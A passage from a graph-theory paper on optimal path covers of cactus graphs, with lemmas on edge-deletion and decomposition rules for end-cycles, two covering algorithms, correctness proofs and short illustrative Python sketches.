**Definition 4:** Let \( G = (V_G, E_G) \) be a cactus. Let \( tr(v) = (v, v_1, ..., v_k) \) be the single trail starting at a vertex \( v \in V_G \). Then \( tr^{-1}(v) \) is the path \((v_k, v_{k-1}, ..., v_1, v)\). Let \( p_1 = (v_1, ..., v_k) \) and \( p_2 = (u_1, ..., u_l) \) be two paths in \( G \), where \((v_k, u_1) \in E_G \). Then \( p_1 \cdot p_2 \) is the path \((v_1, ..., v_k, u_1, ..., u_l)\).
**Lemma 4** (Switching edges in a cover of an end-cycle of order 3): Let \( G = (V_G, E_G) \) be a cactus. Let \( C \subseteq G \) be an end-cycle of order 3 where \( v_1, v_2, v_3, ..., v_k \) are the vertices on \( C^o \), starting from the anchor. Let \( S_G \) be an optimal cover of \( G \) which employs \((v_1, v_2)\) but not \((v_1, v_k)\). Then there exists an optimal cover of \( G \), denoted by \( \tilde{S}_G \), which employs \((v_1, v_k)\) but not \((v_1, v_2)\).

**Proof:** Let \( p = p_1 \cdot p_2 \) be the path in \( S_G \) which employs \((v_1, v_2)\), where \( p_1 \) may be empty (i.e. contain no vertices) and \( p_2 = (v_1, v_2, \ldots, v_n) \), \( n \geq 2 \). \( \tilde{S}_G \) is defined as follows. All paths in \( S_G \) that do not cover vertices in \( C \) are also in \( \tilde{S}_G \).

Observe that since \( C \) contains \( k-1 \) vertices of degree 1 and \( p \) contains at most one of them, at least \( \lceil \frac{k-2}{2} \rceil \) additional paths are used by \( S_G \) to cover the vertices in \( C \) and in \( p_1 \). To prove the lemma, it suffices to show that \( \tilde{S}_G \) uses exactly \( \lceil \frac{k}{2} \rceil \) paths to cover those vertices, employing \((v_1, v_k)\) but not \((v_1, v_2)\). This is established by having \( \tilde{S}_G \) cover those vertices using the paths \( q_1, q_2, \ldots, q_{\lceil \frac{k}{2} \rceil} \) as follows (see Figure 4, where the bold edges are employed by \( \tilde{S}_G \)):

(1) \( q_1 = p_1 \cdot (v_1) \cdot tr(v_k) \).

(2) For \( 1 < i < \lceil \frac{k}{2} \rceil \), \( q_i = tr^{-1}(v_{k-2i+3}) \cdot tr(v_{k-2i+2}) \).

(3) \( q_{\lceil \frac{k}{2} \rceil} = tr^{-1}(v_3) \cdot tr(v_2) \) if \( k \) is even, and \( q_{\lceil \frac{k}{2} \rceil} = tr(v_2) \) if \( k \) is odd. \( \Box \)
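The index bookkeeping in this construction can be checked mechanically: the first path covers \( v_1 \) and \( v_k \) (plus the absorbed prefix and trails), the middle paths cover the pairs \( v_{k-2i+3}, v_{k-2i+2} \), and the last path covers \( v_3, v_2 \) for even \( k \) or \( v_2 \) alone for odd \( k \). A small Python sketch, offered only as an illustration of the counting:

```python
def lemma4_cover_indices(k):
    # Indices of the cycle vertices v_1..v_k touched by each path of the
    # cover built for an order-3 end-cycle (the trails hanging off these
    # vertices are absorbed by tr / tr^{-1} and are not tracked here).
    m = -(-k // 2)                      # ceil(k/2) paths in total
    paths = [[1, k]]                    # first path ends with v_1 and tr(v_k)
    for i in range(2, m):
        paths.append([k - 2*i + 3, k - 2*i + 2])
    paths.append([3, 2] if k % 2 == 0 else [2])
    return paths
```

Iterating this over several values of \( k \) confirms that every cycle vertex is covered exactly once by exactly \( \lceil k/2 \rceil \) paths.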
Definition 5: Let \( G=(V_G, E_G) \) be a cactus. An anchor-trailed end-cycle of \( G \) is an end-cycle of order 3 where the anchor is the start-point of a trail.
Lemma 5 (Deletions due to anchor-trailed end-cycles): Let \( G=(V_G, E_G) \) be a cactus. Let \( C \subseteq G \) be an anchor-trailed end-cycle, where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^0 \), starting from the anchor. Then \( G'=(V_G, E'_G) \) where \( E'_G = E_G - \{(v_1, v_2)\} \) satisfies \( \pi(G')=\pi(G) \).
Proof: Clearly \( \pi(G) \leq \pi(G') \). To prove the reverse inequality (hence equality), we show that every optimal cover of \( G \) defines an equal-size cover of \( G' \). Let \( S_G \) be an optimal cover of \( G \).

(1) If \((v_1, v_2)\) is not employed by \( S_G \) then we are done, since \( S_G \) is also a cover of \( G' \).

(2) If \((v_1, v_2)\) is employed by \( S_G \) but \((v_1, v_k)\) is not, then by Lemma 4 there exists an equal-size cover of \( G \) where \((v_1, v_2)\) is not employed but \((v_1, v_k)\) is. This cover is also a cover of \( G' \).

(3) Suppose that \((v_1, v_2)\) and \((v_1, v_k)\) are both employed by \( S_G \). Let \( u \) be the second vertex on the trail starting at \( v_1 \); observe that \((u, v_1)\) is not employed by \( S_G \). By modifying \( S_G \) to employ \((u, v_1)\) rather than \((v_1, v_2)\), one obtains, using Proposition 1, an equal-size cover of \( G \) where \((v_1, v_2)\) is not employed. This cover is also a cover of \( G' \). \( \Box \)
Definition 6: Let \( G=(V_G, E_G) \) be a cactus. A bridged end-cycle of \( G \) is an end-cycle of order 3 where the anchor is of degree 3.
Lemma 6 (Deletions due to bridged end-cycles): Let \( G=(V_G, E_G) \) be a cactus. Let \( C \subseteq G \) be a bridged end-cycle, where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^0 \), starting from the anchor. Then \( G'=(V_G, E'_G) \) where \( E'_G = E_G - \{(v_2, v_3)\} \) satisfies \( \pi(G')=\pi(G) \).
Proof: Clearly \( \pi(G) \leq \pi(G') \). To prove the reverse inequality, we show that every optimal cover of \( G \) defines an equal-size cover of \( G' \). Let \( S_G \) be an optimal cover of \( G \). If \((v_2, v_3)\) is not employed by \( S_G \) then we are done, since \( S_G \) is also a cover of \( G' \).

(1) Suppose that \((v_1, v_2)\) is employed by \( S_G \). Let \( u \) be the second vertex on \( tr(v_2) \). Since \((v_2, v_3)\) is employed by \( S_G \), \((u, v_2)\) is not employed by \( S_G \). By modifying \( S_G \) to employ \((u, v_2)\) rather than \((v_2, v_3)\), one obtains, using Proposition 1, an equal-size cover of \( G \) where \((v_2, v_3)\) is not employed. This cover is also a cover of \( G' \).

(2) Suppose that \((v_1, v_2)\) is not employed by \( S_G \) but \((v_1, v_k)\) is. Then by Lemma 4, there exists an equal-size cover of \( G \) where \((v_1, v_k)\) is not employed but \((v_1, v_2)\) is, and the argument of (1) above applies.

(3) Suppose that neither \((v_1, v_2)\) nor \((v_1, v_k)\) is employed by \( S_G \). In this case, \( v_1 \) is the end-vertex of some path \( p \in S_G \), and \((u, v_2)\) is employed by \( S_G \). By modifying \( S_G \) to employ \((v_1, v_2)\) rather than \((v_2, v_3)\), one obtains, using Proposition 1, an equal-size cover of \( G \) where \((v_2, v_3)\) is not employed. This cover is also a cover of \( G' \). \( \Box \)
Definition 7: Let \(G = (V_G, E_G)\) be a cactus. An odd-trailed end-cycle of \(G\) is an end-cycle of order 3, \(C\), where the number of trails starting on \(C^o\) is odd. An even-trailed end-cycle of \(G\) is an end-cycle of order 3, \(C\), where the number of trails starting on \(C^o\) is even.
Lemma 7 (Deletions due to odd-trailed end-cycles): Let \(G = (V_G, E_G)\) be a cactus. Let \(C \subseteq G\) be an odd-trailed end-cycle where \(v_1, v_2, ..., v_k\) are the vertices on \(C^o\), starting from the anchor. Then \(G' = (V_G, E'_G)\) where \(E'_G = E_G - \{(v_1,v_2)\}\) satisfies \(\pi(G') = \pi(G)\).
Proof: Clearly \(\pi(G) \leq \pi(G')\). To prove the reverse inequality, we show that every optimal cover of \(G\) defines an equal-size cover of \(G'\). Let \(S_G\) be an optimal cover of \(G\).
(1) If \((v_1,v_2)\) is not employed by a path in \(S_G\) then we are done, since \(S_G\) is also a cover of \(G'\).
(2) If \((v_1,v_2)\) is employed by \(S_G\) but \((v_1,v_k)\) is not, then by Lemma 4 there exists an equal-size cover of \(G\) where \((v_1,v_2)\) is not employed but \((v_1,v_k)\) is. This latter cover is also a cover of \(G'\).
(3) Suppose that \((v_1,v_2)\) and \((v_1,v_k)\) are both employed by \(S_G\). Clearly, every path of \(S_G\) either covers only vertices in \(C\) or only vertices not in \(C\). In this case, an equal-size cover of \(G\), denoted by \(\tilde{S}_G\), can be constructed as follows. All paths in \(S_G\) that do not cover vertices in \(C\) are also in \(\tilde{S}_G\). Observe that at least \(\lceil \frac{k}{2} \rceil\) additional paths are used by \(S_G\) to cover the vertices in \(C\). To prove that \(\tilde{S}_G\) is an optimal cover of \(G'\), it suffices to show that it uses exactly \(\lceil \frac{k}{2} \rceil\) paths to cover those vertices, without employing \((v_1,v_2)\). This is established by having \(\tilde{S}_G\) cover those vertices using the paths \(p_1, p_2, ..., p_{\lceil \frac{k}{2} \rceil}\), where \(p_1 = (v_1) \cdot tr(v_k)\) and for \(1 < i \leq \lceil \frac{k}{2} \rceil\), \(p_i = tr^{-1}(v_{k-2i+2}) \cdot tr(v_{k-2i+3})\). □
Definition 8: Let \(C = (V_C, E_C)\) be a crown where \(C^o\) contains an odd number of vertices \(v_1, v_2, ..., v_k\), each of which is of degree 3 except for \(v_1\). Then \(C^-\) is defined to be the graph induced on \(V_C - \{v_1\}\). Define \(\Delta(C)\) to be a cover of \(C\) using \(\frac{k-1}{2}\) paths as follows:

1. \(p_1 = tr^{-1}(v_2) \cdot (v_1) \cdot tr(v_k)\).

2. If \(k > 3\), then for \(1 < i \leq \frac{k-1}{2}\), \(p_i = tr^{-1}(v_{2i-1}) \cdot tr(v_{2i})\).

Define \(A(C^-)\) to be a cover of \(C^-\) using \(\frac{k-1}{2}\) paths as follows: For \(1 \leq i \leq \frac{k-1}{2}\), \(p_i = tr^{-1}(v_{2i}) \cdot tr(v_{2i+1})\).
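The two covers of Definition 8 can likewise be checked by index bookkeeping: for odd \(k\), \(\Delta(C)\) must touch all of \(v_1, \ldots, v_k\) while the cover of the crown minus its anchor must touch \(v_2, \ldots, v_k\), each using \(\frac{k-1}{2}\) paths. A Python sketch, offered only as an illustration:

```python
def delta_indices(k):
    # Cycle indices touched by each path of Delta(C), k odd: the first
    # path runs tr^{-1}(v_2), v_1, tr(v_k); the rest pair up the
    # consecutive trail start-points v_3, v_4, ..., v_{k-1}.
    paths = [[2, 1, k]]
    for i in range(2, (k - 1) // 2 + 1):
        paths.append([2*i - 1, 2*i])
    return paths

def a_indices(k):
    # Cycle indices touched by each path of the cover of C minus its
    # anchor v_1: the pairs v_2 v_3, v_4 v_5, ..., v_{k-1} v_k.
    return [[2*i, 2*i + 1] for i in range(1, (k - 1) // 2 + 1)]
```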
**Lemma 8 (Covering even-trailed end-cycles using \(A\) and \(\Delta\))**: Let \(G=(V_G, E_G)\) be a cactus. Let \(C \subseteq G\) be an even-trailed end-cycle where \(v_1, v_2, \ldots, v_k\) are the vertices on \(C^o\), starting from the anchor. Let \(S_G\) be an optimal cover of \(G\).

1. If \(S_G\) employs neither \((v_1,v_2)\) nor \((v_1,v_k)\), then \(S_G\) uses \(A(C^-)\) to cover \(C^-\).

2. If \(S_G\) employs both \((v_1,v_2)\) and \((v_1,v_k)\), then \(S_G\) uses \(\Delta(C)\) to cover \(C\).

**Proof**:

1. Let \(S\) be the set of paths used by \(S_G\) to cover \(C^-\). If \(S \neq A(C^-)\), then there exists a path \(p=(u_1, \ldots, u_l) \in S\) where at least one vertex from \(\{u_1, u_l\}\) is not the end-vertex of a trail. Since there are \(k-1\) trails starting on \(C^o\) and \(p\) covers at most one of their degree-1 end-vertices, \(S-\{p\}\) must cover at least \(k-2\) vertices of degree 1, using at least \(\lceil \frac{k-2}{2} \rceil = \frac{k-1}{2}\) paths. Thus, \(|S| \geq 1+\frac{k-1}{2}\). Since \(|A(C^-)|=\frac{k-1}{2}\), a contradiction to the optimality of \(S_G\) arises.

2. The proof for this case is similar to that of the former case, and is omitted. \(\square\)
**Lemma 9 (Deletions due to even-trailed end-cycles that share a vertex)**: Let \(G=(V_G, E_G)\) be a cactus. Let \(X=\{C_1, C_2, \ldots, C_n\}\) (\(n>1\)) be a set of even-trailed end-cycles in \(G\), all sharing the anchor \(v_1\). Let \(v_1, v_2, \ldots, v_k\) be the vertices on \(C_1^o\), starting from the anchor. Then \(G'=(V_G, E'_G)\) where \(E'_G=E_G-\{(v_1,v_2)\}\) satisfies \(\pi(G')=\pi(G)\).

**Proof**: Clearly \(\pi(G)\leq \pi(G')\). To prove the reverse inequality, we show that every optimal cover of \(G\) defines an equal-size cover of \(G'\). Let \(S_G\) be an optimal cover of \(G\).

1. If \((v_1,v_2)\) is not employed by a path in \(S_G\) then we are done, since \(S_G\) is also a cover of \(G'\).

2. If \((v_1,v_2)\) is employed by \(S_G\) but \((v_1,v_k)\) is not, then by Lemma 4 there exists an equal-size cover of \(G\) that employs \((v_1,v_k)\) but not \((v_1,v_2)\). This latter cover is also a cover of \(G'\).

3. Suppose that \((v_1,v_2)\) and \((v_1,v_k)\) are both employed by \(S_G\). Then in some other even-trailed end-cycle \(C_i \in X\), neither of the edges incident to \(v_1\) is employed. By Lemma 8, \(S_G\) covers \(C_1\) and \(C_i^-\) using \(\Delta(C_1)\) and \(A(C_i^-)\), respectively. Observe that an equal-size cover of \(G\) is given by \(\left((S_G-\Delta(C_1))-A(C_i^-)\right) \cup A(C_1^-) \cup \Delta(C_i)\). This latter cover does not employ \((v_1,v_2)\), and is thus a cover of \(G'\). \(\square\)
3. A Recursive Decomposition Rule
In this section we consider end-cycles to which none of the above edge-deletion rules is applicable. Let \( G=(V_G, E_G) \) be a cactus that properly contains a cycle. If \( G \) contains no semi-forks (hence, no forks), then by Lemma 2 \( G \) contains an end-cycle. Moreover, all end-cycles in \( G \) are either of order 2 or of order 3. Assume that no end-cycle of \( G \) is anchor-trailed, bridged, odd-trailed, or an even-trailed end-cycle that shares its anchor with other even-trailed end-cycles. Then any end-cycle \( C \subseteq G \) must be even-trailed with an anchor of degree 4. The recursive decomposition rule applies to such end-cycles.
**Definition 9:** Let \( G=(V_G, E_G) \) be a cactus. A final even-trailed end-cycle of \( G \) is an even-trailed end-cycle where the anchor is of degree 4. Let \( C=(V_C, E_C) \) be a final even-trailed end-cycle in \( G \), where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^o \), starting from the anchor. Let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \). Then \( G|C \) is defined to be the graph \( G|C=(V_G - V_C,\, (E_G - E_C - \{(u,v_1),(v_1,w)\}) \cup \{(u,w)\}) \) (see Figure 5).
(Insert Figure 5 here)
**Lemma 10** (Recursive decomposition rule for final even-trailed end-cycles, part I): Let \( G=(V_G, E_G) \) be a cactus. Let \( C \subseteq G \) be a final even-trailed end-cycle where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^o \), starting from the anchor. Then \( \pi(G|C) \leq \pi(G) - \frac{k-1}{2} \).

**Proof:** Let \( S_G \) be an optimal cover of \( G \). It is proved that \( S_G \) defines a cover \( S_{G|C} \) of \( G|C \) such that \( |S_{G|C}| = |S_G| - \frac{k-1}{2} \).
In the sequel, let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \).
1. Suppose that neither \((u,v_1)\) nor \((v_1,w)\) is employed by \( S_G \). In this case, it is easily verified that \( S_G \) uses \( \Delta(C) \) to cover \( C \). Observe that for each edge \( e \in E_G \), if \( e \) is employed by \( S_G - \Delta(C) \) then \( e \) is an edge in \( G|C \). Thus, \( S_{G|C} = S_G - \Delta(C) \) is a cover of \( G|C \). Its size is given by \( |S_{G|C}| = |S_G| - \frac{k-1}{2} \).
2. Suppose that exactly one edge from \( \{(u,v_1),(v_1,w)\} \), say \( e = (u,v_1) \), is employed by \( S_G \). Let \( p = p_1 \cdot (u,v_1) \cdot p_2 \) be the path in \( S_G \) which employs \( e \), where \( p_1 \) and \( p_2 \) may be empty. Using Proposition 1 and the fact that \( C \) is even-trailed, the reader can verify that an equal-size cover of \( G \) which employs neither \((u,v_1)\) nor \((v_1,w)\) but both \((v_1,v_2)\) and \((v_1,v_k)\) can be obtained by replacing \( p \) by \( p_1 \cdot (u) \) and using \( \Delta(C) \) to cover \( C \). From here, the argument of (1) above applies.
3. Suppose that both \((u,v_1)\) and \((v_1,w)\) are employed by \( S_G \). Then neither \((v_1,v_2)\) nor \((v_1,v_k)\) is employed by \( S_G \). By Lemma 8, \( S_G \) uses \( A(C^-) \) to cover \( C^- \). Let \( p \in S_G \) be the path employing \((u,v_1)\) and \((v_1,w)\), and let \( p' \) be the path obtained by deleting \( v_1 \) from \( p \). Then \( S_{G|C} = (S_G - A(C^-) - \{p\}) \cup \{p'\} \) is a cover of \( G|C \), and its size is \( |S_{G|C}| = |S_G| - \frac{k-1}{2} \). \( \Box \)
Lemma 11 (Recursive decomposition rule for final even-trailed end-cycles, part II): Let \( G = (V_G, E_G) \) be a cactus. Let \( C \subseteq G \) be a final even-trailed end-cycle where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^o \), starting from the anchor. Let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \), and let \( S_{G|C} \) be an optimal cover of \( G \mid C \).
1) Suppose that some path \( p \in S_{G|C} \) employs \((u, w)\). Let \( p' \) be the path obtained from \( p \) by inserting \( v_1 \) between \( u \) and \( w \). Then \( S_G = (S_{G|C} - \{p\}) \cup \{p'\} \cup A(C^-) \) is an optimal cover of \( G \).
2) If \( S_{G|C} \) does not employ \((u, w)\), then \( S_G = S_{G|C} \cup \Delta(C) \) is an optimal cover of \( G \).
Proof: In both cases, \( |S_G| = |S_{G|C}| + \frac{k-1}{2} \). Combining this fact with Lemma 10, we conclude that \( S_G \) is optimal. \( \Box \)
4. The Algorithm
In this section we present an algorithm for optimal covering of cacti. A first version of the algorithm, called Algorithm A, is given below. The purpose of this version is to demonstrate the algorithmic use of the edge-deletion rules and the recursive decomposition rule. In doing so, we focus on simplicity rather than efficiency. An efficient (and more complicated) algorithm is described later.
Informally, Algorithm A runs as follows. The edge-deletion rules are repeatedly applied to delete edges from the input cactus, \( G \). When neither of the edge-deletion rules is applicable any more, the recursive decomposition rule is invoked, and the algorithm is recursively applied to the resulting graph. Eventually, \( G \) reduces to a set of paths which constitutes an optimal cover of \( G \).
We next review some definitions that were given in the previous sections, to be used by the algorithm. Let \( G = (V_G, E_G) \) be a cactus. A vertex \( v \in V_G \) is a fork if \( \deg(v) \geq 3 \) and at least two trails start at \( v \). A vertex \( v_1 \in V_G \) is a semi-fork if \( \deg(v_1) \geq 3 \), exactly one trail \((v_1, v_2, \ldots)\) starts at \( v_1 \), and \( v_1 \) is adjacent to a vertex \( w \neq v_2 \) of degree 1 or 2.
An anchor-trailed end-cycle is an end-cycle of order 3 where the anchor is the start-point of a trail. A bridged end-cycle is an end-cycle of order 3 where the anchor is of degree 3. An odd-trailed end-cycle is an end-cycle of order 3, \( C \), where the number of trails starting on \( C^o \) is odd. An even-trailed end-cycle is an end-cycle of order 3, \( C \), where the number of trails starting on \( C^o \) is even. A final even-trailed end-cycle is an even-trailed end-cycle where the anchor is of degree 4.
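The fork and semi-fork tests are local once trails can be recognized. The following Python sketch is an illustration only; it assumes, per the definitions above, that a trail runs through vertices of degree 2 and terminates in a vertex of degree 1:

```python
def _ends_in_leaf(adj, v, w):
    # Walk from v into neighbour w along degree-2 vertices; the walk is a
    # trail iff it terminates in a vertex of degree 1 (on a cycle the walk
    # returns to v, which has degree >= 3, and is rejected).
    prev, cur = v, w
    while len(adj[cur]) == 2 and cur != v:
        prev, cur = cur, next(x for x in adj[cur] if x != prev)
    return len(adj[cur]) == 1

def is_fork(adj, v):
    # fork: degree >= 3 and at least two trails start at v
    return len(adj[v]) >= 3 and sum(_ends_in_leaf(adj, v, w) for w in adj[v]) >= 2

def is_semi_fork(adj, v):
    # semi-fork: degree >= 3, exactly one trail (v, v2, ...), and some
    # neighbour w != v2 of degree 1 or 2
    if len(adj[v]) < 3:
        return False
    starts = [w for w in adj[v] if _ends_in_leaf(adj, v, w)]
    if len(starts) != 1:
        return False
    v2 = starts[0]
    return any(w != v2 and len(adj[w]) <= 2 for w in adj[v])
```

For instance, a vertex carrying two trails plus a cycle is a fork, while a vertex carrying one trail and lying on a cycle (whose cycle-neighbours have degree 2) is a semi-fork.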
We are now able to present our covering algorithm.
Algorithm A
**Input**: A cactus \( G = (V_G, E_G) \).
**Output**: A set of paths \( S_G \), comprising an optimal cover of \( G \).
**Procedure used**:
**Procedure** Transfer-Paths;
do
Add the isolated paths in $G=(V_G, E_G)$ to $S_G$.
$V_G \leftarrow V_G - \{ v \in V_G \mid \text{some path in } S_G \text{ covers } v \}$.
$E_G \leftarrow E_G - \{ e \in E_G \mid \text{some path in } S_G \text{ employs } e \}$.
od
Method:
1. Initialize $S_G \leftarrow \emptyset$.
2. Transfer-Paths.
3. While $G=(V_G, E_G)$ contains forks,
3.1 Choose a fork $v$.
3.2 Apply Lemma 1 to $v$.
3.3 Transfer-Paths.
(* Comment: At this point, $G$ is a union of trimmed cacti. *)
4. If $G=(V_G, E_G)$ contains a semi-fork $v$, then
4.1 Apply Lemma 1 to $v$.
4.2 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are either of order 2 or of order 3. *)
5. If $G=(V_G, E_G)$ contains a subgraph $C$ which is either an isolated cycle or an end-cycle of order 2, then
5.1 Apply Lemma 3 to $C$.
5.2 Transfer-Paths.
5.3 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are of order 3. *)
6. If $G=(V_G, E_G)$ contains an anchor-trailed end-cycle, $C$, then
6.1 Apply Lemma 5 to $C$.
6.2 Go to step 3.
7. If $G=(V_G, E_G)$ contains a bridged end-cycle, $C$, then
7.1 Apply Lemma 6 to $C$.
7.2 Go to step 3.
8. If $G=(V_G, E_G)$ contains an odd-trailed end-cycle, $C$, then
8.1 Apply Lemma 7 to $C$.
8.2 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are even-trailed end-cycles. *)
9. If $G=(V_G, E_G)$ contains two or more even-trailed end-cycles that share a vertex $v$, then
9.1 Choose an even-trailed end-cycle $C$ from those sharing $v$.
9.2 Apply Lemma 9 to $C$.
9.3 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are final even-trailed end-cycles. *)
10. If $G=(V_G, E_G)$ contains a final even-trailed end-cycle, $C$, then
10.1 Let $v$ be the anchor of $C$. Let $u$ and $w$ be the vertices adjacent to $v$ that are not on $C$.
10.2 Recursively apply the algorithm to $G|C$, resulting in an optimal cover $S_{G|C}$.
10.3 If $(u,w)$ is employed by a path $p \in S_{G|C}$, then
10.3.1 Let $p'$ be the path obtained from $p$ by inserting $v$ between $u$ and $w$.
10.3.2 $S_G \leftarrow S_G \cup (S_{G|C}-\{p\}) \cup \{p'\} \cup A(C^-)$
10.4 Otherwise, $S_G \leftarrow S_G \cup S_{G|C} \cup \Delta(C)$.
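Procedure Transfer-Paths admits a compact sketch. The following Python illustration (not part of the paper) represents $G$ as a dict from vertex to neighbour set, mutated in place, and appends each isolated path to the cover:

```python
def transfer_paths(adj, cover):
    # Move every isolated path of G into the cover S_G, deleting its
    # vertices and edges from the graph (adj is mutated in place).
    seen = set()
    for s in list(adj):
        if s in seen:
            continue
        comp, stack = set(), [s]          # connected component of s
        while stack:
            u = stack.pop()
            if u not in comp:
                comp.add(u)
                stack.extend(adj[u])
        seen |= comp
        degs = [len(adj[u]) for u in comp]
        # a component is an isolated path iff it is a tree of max degree <= 2
        if max(degs) <= 2 and sum(degs) == 2 * (len(comp) - 1):
            ends = [u for u in comp if len(adj[u]) <= 1]
            path, prev, cur = [], None, ends[0]
            while cur is not None:        # walk from one endpoint to the other
                path.append(cur)
                cur, prev = next((x for x in adj[cur] if x != prev), None), cur
            cover.append(path)
            for u in comp:                # delete the transferred path from G
                del adj[u]
```

Components that still contain a cycle fail the tree test and are left in the graph, matching the procedure's behaviour.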
Theorem 1 (Correctness of Algorithm A): Given a cactus $G=(V_G, E_G)$, Algorithm A produces an optimal path cover of $G$.
Proof: Whenever the algorithm returns to step 3, the size of $E_G$ is strictly smaller than it was in the previous execution of step 3. Thus, the algorithm eventually terminates, since none of the conditions tested in steps 3-10 holds when $E_G = \emptyset$.
Upon termination, $G$ contains no forks, semi-forks, isolated cycles, or end-cycles. Hence, by Lemma 2, $G$ contains no non-isolated cycles. Also, $G$ contains no isolated paths upon termination, for such paths, which are generated only by applying Lemmas 1 and 3, are immediately transferred to $S_G$. It follows that upon termination $V_G = \emptyset$, so $S_G$ is a cover of $G$.
The algorithm deletes edges from $G$ only by applying the edge-deletion rules. The decomposition rule ensures that the construction of an optimal cover, upon return from each recursive invocation of the algorithm, is properly done. We conclude that when the algorithm terminates, $|S_G| = \pi(G)$. \hfill \qedsymbol
Using the fact that the number of cycles in a cactus $G=(V_G, E_G)$ is $O(|E_G|)$, the reader can verify that Algorithm A can be implemented in $O(|E_G|^2) = O(|V_G|^2)$ time. However, a better bound is in fact achievable by Algorithm B below.
Algorithm B is based on the DFS (depth-first search) algorithm ([7], see also [4]), with which we assume the reader is familiar.
Definition 10: An EDFS is a DFS extended to identify forks/semi-forks upon backtracking from such. Recall that DFS generates a directed tree, where edges not in the tree are called back-edges. Assume that an EDFS is applied to a cactus $G=(V_G, E_G)$, and that $e \in E_G$ is a back-edge of the EDFS tree. Then $C(e)$ is defined to be the unique cycle in $G$ which contains $e$. The source of a cycle $C$ with respect to the EDFS is the first vertex on $C$ which was discovered by the EDFS.
Note that if $v$ is a source of a cycle, $C$, then there is a back-edge $(u \rightarrow v)$ on $C$ entering $v$. Let $G=(V_G, E_G)$ be a graph, and let $v \in V_G$ be a separating vertex of $G$. Assume that one of the connected components which $v$ separates from $G$ is a tree, $T=(V_T, E_T)$.
An elimination of $T$ from $G$ is an EDFS traversal of $T$, starting from $v$, where Lemma 1 is applied to each fork $u \in V_T - \{v\}$ upon backtracking from $u$.
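The role of back-edges in Definition 10 can be illustrated concisely: in a DFS of a cactus every cycle contributes exactly one back-edge, and $C(e)$ is recovered by climbing tree-parents from the back-edge's deeper endpoint. A Python sketch, assuming a connected cactus (an illustration only, not the paper's EDFS):

```python
import sys

def cactus_cycles(adj, root):
    # One DFS back-edge per cycle of a cactus; C(e) is the tree path
    # between the back-edge's endpoints plus the back-edge itself.
    sys.setrecursionlimit(100000)
    parent, depth = {root: None}, {root: 0}
    cycles = []

    def dfs(u):
        for w in adj[u]:
            if w not in parent:
                parent[w], depth[w] = u, depth[u] + 1
                dfs(w)
            elif w != parent[u] and depth[w] < depth[u]:
                cyc, a = [u], u           # back-edge (u -> w): climb up to w
                while a != w:
                    a = parent[a]
                    cyc.append(a)
                cycles.append(cyc)

    dfs(root)
    return cycles
```

The first vertex of each recovered cycle to have been discovered by the DFS (here, the shallowest one) is the cycle's source in the sense of Definition 10.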
Algorithm B, whose time complexity is $O(|V_G|)$, is outlined below. It is based on an EDFS traversal of the input cactus. In the course of the EDFS, the edge-deletion rules, as well as the recursive decomposition rule, are applied to $G$, resulting in a properly smaller graph. Specifically, these rules are applied whenever the algorithm backtracks from a fork that is not on a cycle, or from a source of a cycle. The isolated paths created by applying the edge-deletion rules are transferred to the set $S_G$, which eventually constitutes an optimal cover of $G$. Whenever a final even-trailed end-cycle, $C$, is detected, the two vertices adjacent to the anchor of $C$ are connected to form $G|C$; $C$ is then pushed onto a stack, to be covered when $G|C$ is fully covered.
Algorithm B
Initialize $S_G \leftarrow \emptyset$. Starting from an arbitrary vertex, traverse $G$ using EDFS. Immediately before backtracking from a vertex $v$, invoke procedure $Backtrack-From(v)$, described below.
Procedure $Backtrack-From(v)$
\begin{verbatim}
do
1 Record the father of $v$.
2 If $v$ is not on a cycle and is a fork, apply Lemma 1 to $v$.
3 If $v$ is the source of a cycle, perform the following:
3.1 Let $B_v$ be the set of EDFS back-edges entering $v$. Temporarily suspend the EDFS, and for each $e = (u \rightarrow v) \in B_v$, re-traverse the remaining edges of $C(e)$, backtracking the EDFS tree-edges, starting from $u$. Stop the re-traversal of $C(e)$ upon discovering a fork or a semi-fork. If none exists, count the number of trails starting on $C(e)$.
3.2 Let $S = \{ e \in B_v \mid C(e) \text{ contains a fork or a semi-fork} \}$. For each $e \in S$, apply Lemma 1 to a fork or a semi-fork on $C(e)$, transferring the isolated paths thus created to $S_G$.
3.3 The remaining edges of the cycles of $S$ induce a tree which is separated from $G$ by $v$. Eliminate this tree from $G$, transferring the isolated paths thus created to $S_G$.
3.4 While $B_v$ contains an edge $e$ such that no edge on $C(e)$ was deleted, perform the following:
3.4.1 If $C(e)$ is an isolated cycle or is contained in an end-cycle, $C$, that satisfies the requirements of some edge-deletion lemma, perform the following:
Apply that lemma to $C$. The remaining edges of $C$ now induce a tree which is separated from $G$ by $v$. Eliminate this tree from $G$, transferring the isolated paths thus created to $S_G$.
3.4.2 If $C(e)$ underlies a final even-trailed end-cycle, $C$, perform the following:
Let $u$ and $w$ be the vertices adjacent to $v$ that are not on $C$. Delete all the vertices of $C$ from $G$, and connect $u$ and $w$ to form $G|C$. Push $C$ onto the stack of the yet-uncovered end-cycles.
\end{verbatim}
Theorem 2 (Correctness of Algorithm B): Given a cactus \( G=(V_G, E_G) \), Algorithm B produces an optimal cover of \( G \) in \( O(|V_G|) \) time.
Proof (Outline): The theorem can be established using the following claims, which, in turn, can be verified by standard techniques for proving the correctness of DFS-based algorithms. In the sequel, we say that \( u \) is a descendant of \( v \) at a given time within the execution of the algorithm, if, at that time, \( u \) is reachable from \( v \) by a sequence of tree edges \((v \rightarrow x_1), (x_1 \rightarrow x_2), \ldots, (x_{n-1} \rightarrow x_n), (x_n \rightarrow u)\).
1. Upon invoking \( \text{Backtrack-From}(v) \), \( v \) is on a cycle iff there is a back-edge entering \( v \) or \( \text{lowpoint}(v) \leq \delta(v) \) (see [4]). Hence, checking if \( v \) is on a cycle can be done in constant time.
2. Upon invoking \( \text{Backtrack-From}(v) \), if \( v \) is not on a cycle then no descendant of \( v \) is a fork or on a cycle.
